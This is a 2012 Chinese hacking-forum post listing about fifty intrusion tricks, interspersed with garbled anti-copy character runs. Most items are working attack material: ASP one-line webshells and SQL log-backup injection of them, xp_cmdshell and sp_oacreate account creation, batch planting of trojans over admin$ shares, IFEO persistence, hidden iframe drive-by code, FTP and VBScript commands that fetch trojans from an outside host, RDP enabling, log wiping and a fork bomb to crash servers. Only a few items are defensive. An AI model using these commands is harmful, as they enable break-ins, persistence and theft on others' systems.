中国网络渗透测试联盟

标题: 一些笔记 [打印本页]

作者: admin    时间: 2012-9-15 14:51
标题: 一些笔记
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
8 U1 \; L) |! {. T% y& K1 f- N5 o! `cacls C:\windows\system32 /G hqw20:R
  D. |5 y. H6 [- Y( {& I9 [思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
4 W, s. S2 t( ^2 q( w  i8 a7 c8 s恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F5 W. r" L" w7 W  M

' M9 g& a; ~5 D2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
" d7 C3 G5 M$ r" H6 O* U5 D: t* B( {
# D; S8 l* r4 V/ {3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
6 w- s, z* t0 r9 h+ Z; ]) e& I" U# W, N
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
% z! C- w  e4 ^& r. G- P; F; b# x- R8 _
5、利用INF文件来修改注册表6 z8 w- v' P. T
[Version]5 m! b9 |3 G" ]" [5 v1 b
Signature="$CHICAGO$"% G* x0 C, c+ J% X
[Defaultinstall]
4 E1 Q) ~  r( T1 B- S, ~! raddREG=Ating/ B' L' r; d. i  Q$ N
[Ating]
1 u; |" ~4 p9 w0 n' V! y* x' ZHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"; G7 h& ?7 l" Z: s( S1 o$ `# J
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
8 s6 {: V( }7 irundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
# r& I4 F$ D$ n; @其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU' f4 j+ ~- }) @" l$ n+ Q% q6 R
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU" S" w6 h$ _( r- D/ c5 {
HKEY_CURRENT_CONFIG 简写为 HKCC* W" F  F% w$ K( S( C5 k( q
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值* }$ U" _9 |# }3 l3 X: P; B/ `: T/ f
"1"这里代表是写入或删除注册表键值中的具体数据
! @4 ?7 N6 I* b# ^
6 k1 M8 Y$ J0 |2 h# l! [( d3 X6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,/ s! H( Q$ M7 x) z1 `/ D* v  ~
多了一步就是在防火墙里添加个端口,然后导出其键值
% V4 ]0 ?! k+ }5 m" W; H/ t4 \[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
# ~* E, h/ X. P
3 T4 K+ ~4 H" W- v3 c7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽" P- a, e% |3 s1 C$ \) n7 ?0 ?/ Z
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
; z' q  W) d! g) [6 j8 x. _# j9 F0 O0 L. ?" |2 I- ]+ O
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。3 t% Y$ c, @  N6 ^- _& Y+ h' W
1 @& B9 f7 d, J: w; y0 P
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
5 m, `) ~$ ~+ J6 C6 _/ z; {) Y) t可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
6 L' Q7 p1 z) ^3 f' I  X
2 K" {! A& Z2 _+ ?4 \( p10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”9 q# M+ G1 W# j

; w7 x$ d( |5 e! p11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,; L: t- a4 c6 X4 q
用法:xsniff –pass –hide –log pass.txt$ `4 O0 O1 c8 |6 y- g6 d

* F& {( d  t$ Q12、google搜索的艺术
' T0 q4 `4 e6 h+ a搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”9 G% |, o/ h# V3 J" F. S
或“字符串的语法错误”可以找到很多sql注入漏洞。
5 p+ Y' r4 L, i1 b& d$ T7 H8 a4 H$ T1 @
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
. _5 V+ ~0 O: X5 q. o: L4 {- u+ n) l# {/ [$ v
14、cmd中输入 nc –vv –l –p 19872 V- k$ t! D% a/ z( H! C
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
8 C: }+ X* P. s5 i# @, p
$ @" u8 ~" m# `15、制作T++木马,先写个ating.hta文件,内容为0 @, k: K2 \; z
<script language="VBScript">) n7 [! s' @& p) H; N
set wshshell=createobject ("wscript.shell" )
, p# |3 H- }) p; _. _a=wshshell.run("你马的名称",1)) {4 ]5 I8 T- Z0 }& T  L
window.close+ w& H; ~+ A7 o7 T' K
</script>4 N  P% b' N" A$ H7 y$ s7 y
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
8 D1 ]6 B2 ]/ E  ]4 ^
4 T1 Q9 S! ~2 V+ l: G8 [8 j7 h16、搜索栏里输入7 a& v) w/ }: Y; h" m9 X4 f
关键字%'and 1=1 and '%'='
( k  y! ]3 U* A3 `关键字%'and 1=2 and '%'='
! v! D/ ~7 J3 I# @4 ?) l比较不同处 可以作为注入的特征字符
/ f$ V4 n; F; Z: I5 W5 {% _* E: T$ a. k
17、挂马代码<html>0 s  m  ~+ F# ~5 f  d6 p) z
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
; A  J$ @/ [& n</html>
6 o% i4 K. C6 F/ ?5 m/ d# O# s/ [
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
3 V- k# Z& `' L/ ?+ P* _5 C, Knet localgroup administrators还是可以看出Guest是管理员来。
' |- k( k) C. {) }% K6 \( Y6 @7 F8 i0 d! \4 E, X# M
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
( L5 ~7 P6 `' X8 j用法: 安装: instsrv.exe 服务名称 路径, \8 h- t2 Z5 }8 E  y1 \
卸载: instsrv.exe 服务名称 REMOVE
3 \6 n* s! n$ p! R5 w
+ R+ t- d9 D4 s. r# w8 B
1 U3 i. f1 D# g& F$ s9 }* X# O21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉1 k/ l3 W' U; i2 H5 e' r7 `; Z
不能注入时要第一时间想到%5c暴库。
9 e6 s* A- j, n2 C  J, s3 A) Q: o5 A0 m% g: ]/ [
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
6 f5 Y6 ?! V5 M+ G' ]& [6 e! u# V5 y- U8 i; Q; ^$ G
23、缺少xp_cmdshell时% a0 R+ o/ Z/ r- Y& q) u
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'1 x* g7 `5 l' d. S! l
假如恢复不成功,可以尝试直接加用户(针对开3389的)
% Y9 _) K: n5 Z  W4 {! Fdeclare @o int# |$ }/ g3 B: F
exec sp_oacreate 'wscript.shell',@o out0 F/ A$ R) ^$ `
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员+ @' v9 T* c+ m9 c' ^8 @6 M$ k$ g) l
$ ~0 g% G* X& x( i6 b: X( G3 G, f
24.批量种植木马.bat4 T0 ~/ _) m3 y0 b4 j+ t( A  }
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中, _7 \/ N7 j/ a/ b. i; b
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
, z: p1 C- F; x6 l  ]* \+ ~, o, V扫描地址.txt里每个主机名一行 用\\开头$ Q- o) z& J$ U# i2 }- V6 b) r
' g( Q  q3 i7 V
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
% ~. A! x* T4 d- D
+ \( j: R( e7 ~6 ]1 @26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名." h( |1 l8 Y, B) G
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
, V5 v! E6 `: l5 _$ P9 z) p9 R' P.cer 等后缀的文件夹下都可以运行任何后缀的asp木马$ o+ A+ a* N" \3 n; n  J% C

$ d. q: Q8 x" j0 u27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP8 c/ d* p0 r" _  V* x' V1 }
然后用#clear logg和#clear line vty *删除日志; E2 ]2 `& z) V# L1 g

" n4 ]# [/ e% p# j* `28、电脑坏了省去重新安装系统的方法, `  p2 K9 b8 t- G2 g2 ]& \
纯dos下执行,- s. f7 O9 K9 P; B; [/ Q7 O2 a8 y
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config8 _! M. E/ f6 {) W+ _! z
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
7 c. p& V( F3 i
. e- b8 y7 S# H4 D" f& S; ~29、解决TCP/IP筛选 在注册表里有三处,分别是:
4 l: z- ]) K& ], s( s. @. }HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip' V4 X; i9 ?- Q1 d
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
2 R$ e- f6 p: P! A0 B) rHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
3 o/ V" }4 D# q8 d" }4 A分别用
. h9 A: v' @& e% X/ R$ R+ E5 A3 I3 @regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip7 A2 S+ G# y2 _  i: O, m/ m
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip' }( e5 [) F, F3 ?, O5 w8 s( d
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip4 m0 |/ O0 `3 A7 @' ]+ _
命令来导出注册表项
7 e3 ]0 K3 q, c9 {然后把三个文件里的EnableSecurityFilters"=dword:00000001,
$ a9 u1 a! m! r( j- ^- b改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用7 R# R# H! h' S6 j: q
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
- I2 w2 J6 d* I0 H4 Z
& a" j; |, ^1 P; c5 y4 E" p30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
/ a& B' g6 }2 r, g/ I) mSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
- F, @# S1 i- ~$ j, p0 Q# V6 k- W% S5 Y5 h9 w% B  x& w
31、全手工打造开3389工具
! `8 O! d8 Q! Z9 \. S打开记事本,编辑内容如下:' c* g9 F# k4 ?+ @: G1 z4 h
echo [Components] > c:\sql  S3 C4 p! m& r8 f, h
echo TSEnable = on >> c:\sql+ ?2 ~) Q0 I# [$ V
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
8 e& }2 M) c5 P7 b+ [编辑好后存为BAT文件,上传至肉鸡,执行$ j3 J- o' q2 Q/ I+ j
) R1 |7 n' A+ c) H# ~
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
/ |* q& N0 v% n4 ~6 k
, o6 D5 l( X& ~% _) K* r33、让服务器重启- {9 R  k; U% s% b- Y( g% E7 W
写个bat死循环:
: T1 h) \5 Z6 k: v0 M@echo off
9 H% {7 V) F; R5 f' H  q7 M:loop1" Q3 k, A8 @7 I" {
cls
; D6 g; q( N! x7 f: c- p/ J9 x- y  H+ qstart cmd.exe0 Q6 @$ E, o( r$ P
goto loop1" o0 P! z% C, G& E4 W! ^9 m3 H4 O
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启5 m( x$ B4 `2 _3 `1 G: b. ?
, r; J- I$ C) U: l
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
7 x- p3 B- K! ]  F% L@echo off6 S( w* q( D3 P
date /t >c:/3389.txt
, s  m9 j$ o* P8 Vtime /t >>c:/3389.txt0 P' l6 i* O, {
attrib +s +h c:/3389.bat
: }' q7 l$ J. M& a0 f7 p$ R8 [attrib +s +h c:/3389.txt
& b1 f3 J0 J2 \: jnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
7 @# C3 f) M, E7 i3 g并保存为3389.bat
$ Z9 W% j  J) R2 `4 H" T打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号  _/ j/ S/ D' w
9 S+ B7 j( G1 i" S( u. r
35、有时候提不了权限的话,试试这个命令,在命令行里输入:+ i) Y/ r( I. @. m, ~8 v
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)9 l+ [' T$ V* D
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。+ @" F6 G: k3 b& j1 c/ a
' I1 j2 S1 @( n' q% n; h) I4 i
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
; ?' {) d5 ~2 techo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
' A2 f& s+ Z5 d9 X1 V& z, N' j4 techo 你的FTP账号 >>c:\1.bat //输入账号7 T% n+ _# D+ p' P9 A
echo 你的FTP密码 >>c:\1.bat //输入密码: B9 K' R# \. _
echo bin >>c:\1.bat //登入$ m+ V7 d1 g& I
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么! G9 d8 l1 W& ?. b# a* p$ g
echo bye >>c:\1.bat //退出
. Y( i) c) ?7 h( x然后执行ftp -s:c:\1.bat即可
0 G& @: l% I, q* T3 z! |: v
1 v) ^- A' g* y) P/ C37、修改注册表开3389两法; C# K# ?4 n5 A- m& c" ?
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
8 _" ]0 Z  i1 h- x; qecho Windows Registry Editor Version 5.00 >>3389.reg* J$ |4 k1 e- O+ d7 N
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
9 {' r) j- v" c# L* r2 U! b) a. secho "Enabled"="0" >>3389.reg+ C- P+ P* _5 y7 J1 G+ O; G2 h
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
4 a& Z: q, M! M9 p1 |1 t7 C& \; HNT\CurrentVersion\Winlogon] >>3389.reg
& C  L  X" R7 [echo "ShutdownWithoutLogon"="0" >>3389.reg
4 G; J! m) p$ m# X# Z4 {1 lecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]0 t; }- {1 Z7 P" |7 a' N& _
>>3389.reg2 S7 A$ y- F( n
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg6 o2 g3 K7 B9 G  K
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
6 `  g" Q+ F( F& r0 }>>3389.reg& `6 O  B3 d! e; P- L
echo "TSEnabled"=dword:00000001 >>3389.reg( Q; G) B! t7 t& x8 C: f. W$ ^+ O
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
) ^  J" B& E9 [" x7 r- F' Cecho "Start"=dword:00000002 >>3389.reg
  O+ \, @% _4 _echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
) D! V! v+ r/ m) ]5 i7 D8 ?; e>>3389.reg
' f- q+ B. s3 r+ I: Yecho "Start"=dword:00000002 >>3389.reg
& ?  U3 {* u2 ?% ]echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
7 `& h! h) P6 e6 wecho "Hotkey"="1" >>3389.reg
8 D1 D  }+ P  K0 P' P1 d0 b0 Qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal& U6 Y& W, z; z4 v* E
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
5 k7 \2 w: ^5 a: Secho "PortNumber"=dword:00000D3D >>3389.reg! [. F0 i# f  l! v, l/ Q$ B
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
! w, A4 U" C( G- R" \1 r# L% hServer\WinStations\RDP-Tcp] >>3389.reg" q7 w0 `  z5 K- h! x
echo "PortNumber"=dword:00000D3D >>3389.reg
" b- n6 Q/ E; |" r& c( Y把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。1 E4 k# _$ d- e
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
8 s9 `/ v# R, J因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效8 U9 o4 M0 @, k: L- l+ o: p7 u* {. x
(2)winxp和win2003终端开启2 s; I2 {5 C+ ]. E7 `0 g
用以下ECHO代码写一个REG文件:
8 e5 X6 F* Q4 n( Iecho Windows Registry Editor Version 5.00>>3389.reg- K$ f+ v7 G! f
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal$ r# X' e, _1 ?# f9 [6 N( u% C$ q
Server]>>3389.reg$ C% L/ e  R' f4 f9 F$ b; r
echo "fDenyTSConnections"=dword:00000000>>3389.reg
! v# r! x: r7 W; q' Q; Q. i8 aecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal8 L: i8 s" a2 x/ F- x1 I+ h6 Z7 w
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
3 ?" ?, N+ N% m- Aecho "PortNumber"=dword:00000d3d>>3389.reg* J: _: ^8 v/ [$ z8 d* V% O
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
, u2 F# W0 R3 Z* V; b" _% S2 w) rServer\WinStations\RDP-Tcp]>>3389.reg) J/ I: g  k0 W
echo "PortNumber"=dword:00000d3d>>3389.reg
3 A6 h5 Q3 @5 l. W8 O# X然后regedit /s 3389.reg del 3389.reg0 u0 {4 }* g# d5 T
XP下不论开终端还是改终端端口都不需重启3 F3 x5 _9 \  A# M! D7 E
2 }8 t# x$ c0 p3 f
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃9 s; P2 U# _% i* d% ]
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
- g2 s% @' ?5 V) q% w. M0 G, {  J+ m9 k: I  R) {$ c( b5 ]
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!- x, b7 @# K4 t! ?
(1)数据库文件名应复杂并要有特殊字符% [* k0 ?4 [' M2 G: B
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
% I2 u, W1 i1 u5 y# Q7 J将conn.asp文档中的
9 `. C+ w' q+ e& m/ G9 U0 @$ UDBPath = Server.MapPath("数据库.mdb")" U0 [/ I( G8 d
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath6 r, ]: k) E% _: A# Y. o
/ V6 U0 I0 t4 U3 c6 a! O: Y
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
, B4 Z; Y% p) B/ Y" }(3)不放在WEB目录里+ L5 }! ]  @$ z

' f  H. k6 k' O( E! L9 j40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉4 a' s- [6 t# f, |7 O
可以写两个bat文件9 z+ K' I. g" U* e3 @* E  [
@echo off
' Q# E9 q) G" Z# }# C9 c@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe+ P, B2 Z3 b# g
@del c:\winnt\system32\query.exe! l# M& u# E! O6 k8 w
@del %SYSTEMROOT%\system32\dllcache\query.exe
! s1 ~, f) T9 k! _' \& C@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
. J% G" }; r, J" R4 P% _+ i6 v) a9 H
@echo off; p) j/ k4 `* }/ g( R  E
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
3 ?2 S9 ?2 S7 v7 {! {+ O@del c:\winnt\system32\tsadmin.exe
/ U* ~# s$ O- `6 l* i@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
5 G2 u9 {2 \* L% z. \
: W$ E8 U" g. C. F41、映射对方盘符% t' D, x! Q6 N1 m. M/ j
telnet到他的机器上,
# M* e; c  E+ b) ynet share 查看有没有默认共享 如果没有,那么就接着运行
) D! Q  Q; m( K1 b, H9 {net share c$=c:
% t  X0 K7 o* a8 _$ f0 G6 [net share现在有c$8 n$ o6 O1 L0 W$ P# o; S
在自己的机器上运行
+ {! H" v( p, y* [0 Unet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K4 u7 U* @. l4 y! O0 K

2 O+ V. m* Q/ k% Z' j9 J42、一些很有用的老知识: H$ t' o& I0 H% ]4 B3 t
type c:\boot.ini ( 查看系统版本 )
5 @2 D. V5 @; gnet start (查看已经启动的服务)
7 _+ D2 a8 F: e( X! S% E- Hquery user ( 查看当前终端连接 )/ q* k5 o& w7 W
net user ( 查看当前用户 )
$ u2 M& Q1 o; U& O7 i4 K' h4 ^" ]net user 用户 密码/add ( 建立账号 )$ k/ l% d! y4 f# K: U
net localgroup administrators 用户 /add (提升某用户为管理员)* x7 q& B2 c! W" e1 Z1 l6 |
ipconfig -all ( 查看IP什么的 )* Z% }9 c( a0 s; K/ }3 I
netstat -an ( 查看当前网络状态 )
4 U7 U3 I7 B+ L$ d, cfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码): A& Y9 i; x4 r2 V  u
克隆时Administrator对应1F48 |/ d3 V+ m5 ?
guest对应1F5% i! y" a, f  F: n/ U; n
tsinternetuser对应3E8! j7 ^1 p: d) Q/ v2 w

0 I8 T+ G9 f) A) L! z43、如果对方没开3389,但是装了Remote Administrator Service/ Z* Q- p- G" b& }) g
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接( T$ V7 k( C3 j4 f
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息, O6 G, f1 X+ z
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"8 I( c9 `& V/ n5 H* \0 h! A4 w

$ g+ X# h( V/ _/ h; m8 V44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
3 X. t9 Y9 H5 _' G0 H3 J+ ~& d本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
1 r  {) ^) G  e1 e8 t  E
( W" a. w. ]" \: U, g, {3 j( c, w45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
- t/ a2 H; _8 C3 P! l4 {; iecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
# [+ W# ]: O+ k* Q# C^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
$ M8 j3 I  B1 M' E! q& f2 n7 E0 L. d% l/ {CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =" c8 Z/ z2 B' {- u# U4 G
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
/ L+ q1 H/ y2 x* |! }(这是完整的一句话,其中没有换行符)
. I2 a$ v' z2 d) ]% x" E然后下载:2 b) f, |1 P* H* i3 L! m: G9 E
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
- ~3 t  m. H7 M, ^6 I! z6 ~+ b
: Y/ O- M# K2 Z& C+ h5 W) \3 {' ?46、一句话木马成功依赖于两个条件:" t, \; v8 p1 H6 t* P
1、服务端没有禁止adodb.Stream或FSO组件
' l# X2 R8 Z% T& j) R- J/ w8 f6 k2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
7 _) d. M9 n3 V9 t- d
% v' G2 R& M. L" g6 `4 `$ R, r47、利用DB_OWNER权限进行手工备份一句话木马的代码:
8 e0 U, h; s. O- \7 T;alter database utsz set RECOVERY FULL--( J" c* n' R1 i
;create table cmd (a image)--
$ O1 d3 c3 w) d' ^;backup log utsz to disk = 'D:\cmd' with init--
: |6 {5 Y) [4 Z6 x- R4 E;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--, _3 L0 G. G2 P  x) U9 `) f, f
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--8 U3 D! g! h) t$ y7 N5 A( T
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
8 Y3 ?- a9 p# ]5 `# `/ w/ f6 G' ?8 D; A$ R( Q  h
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:. Q) z9 U- I# k5 `# j  I- h% c, S1 A
. w7 @8 ^3 i% P: M% B
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
0 @. x: f% |3 c) C5 {所有会话用 'all'。
/ ?/ R: P; m3 P-s sessionid 列出会话的信息。- H: @9 }; r: f, N: W& U8 M
-k sessionid 终止会话。
$ L# v8 L! W( }. i-m sessionid 发送消息到会话。
$ E3 r: O# A% j% k( l7 k; [: M2 w, q# f3 v7 Y( w& a) z) l% S) h
config 配置 telnet 服务器参数。5 \/ b% o; T# @

/ g/ a% I: h. K: i4 q% Q7 |common_options 为:
7 N' P: g' n& ?& N$ L* ~+ f-u user 指定要使用其凭据的用户# t- [: d* L7 o/ S% P; c1 C0 r( U
-p password 用户密码
6 x) p6 B3 w, j2 ^: H+ S
! q1 o% L; c5 Jconfig_options 为:* v4 h* W  A. v) T5 \# O/ t
dom = domain 设定用户的默认域
6 g, Y* l) B! h' n$ }' K: vctrlakeymap = yes|no 设定 ALT 键的映射: N) S) N( {# D! |" @, u* Z
timeout = hh:mm:ss 设定空闲会话超时值! r) \$ D% O7 e
timeoutactive = yes|no 启用空闲会话。
  m4 v( @( R* G; C' \9 `! Jmaxfail = attempts 设定断开前失败的登录企图数。
9 p7 ?+ m: T4 A/ ]: Y0 z9 z8 Rmaxconn = connections 设定最大连接数。" @. L' D+ t( M5 j% {# x
port = number 设定 telnet 端口。6 G; o7 h! W. U3 z( e( }  D0 F
sec = [+/-]NTLM [+/-]passwd
" i" e! H* A5 T设定身份验证机构2 Z( U9 G& R8 f" C
fname = file 指定审计文件名。; s  N2 i- H4 F0 V# {7 L
fsize = size 指定审计文件的最大尺寸(MB)。5 `) F+ Z1 o1 Y; V
mode = console|stream 指定操作模式。+ F& ?( r3 N# ?2 e: X
auditlocation = eventlog|file|both
: u+ b6 [( L) u% Q; c# k8 k指定记录地点' X6 V+ X/ r* Y3 [
audit = [+/-]user [+/-]fail [+/-]admin
6 ^2 ?) N% S: b6 P* l1 j4 }- f5 F8 k, I4 `. C( q6 ?
49、例如:在IE上访问:
; l8 d! Y  T; owww.hack520.org/hack.txt就会跳转到http://www.hack520.org/. w5 `& V9 W$ v% Z6 J
hack.txt里面的代码是:2 a( @- k, c# `5 ?% L  c$ q. H
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
* M' _  H7 O- d5 f( v$ y把这个hack.txt发到你空间就可以了!
) j* O# s' P2 f+ H7 ]这个可以利用来做网马哦!. Y/ j  b& \1 B$ ^6 B0 H9 L& c: @8 t, G
" T% c! k4 o* Z- P
50、autorun的病毒可以通过手动限制!
/ g5 W4 v8 e0 F$ Y5 A' r4 A1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
; S2 r; r5 X4 j( e" M2,打开盘符用右键打开!切忌双击盘符~* j* |% _1 Z( N  G8 O1 x
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!) M; b: n3 V7 r

+ q. m* m! c8 N/ I* J; s51、log备份时的一句话木马:
$ o! G6 |5 x  P  Y: Z7 G7 Xa).<%%25Execute(request("go"))%%25>1 }3 `+ S5 R' O5 m+ i8 w/ L
b).<%Execute(request("go"))%>0 Q+ W; F% b; B
c).%><%execute request("go")%><%
8 l% t5 Y" U% D3 id).<script language=VBScript runat=server>execute request("sb")</Script>( Z7 C% e+ q7 C( e! R. A3 B
e).<%25Execute(request("l"))%25>1 L3 X0 Q  r0 E8 B) Y9 z
f).<%if request("cmd")<>"" then execute request("pass")%>
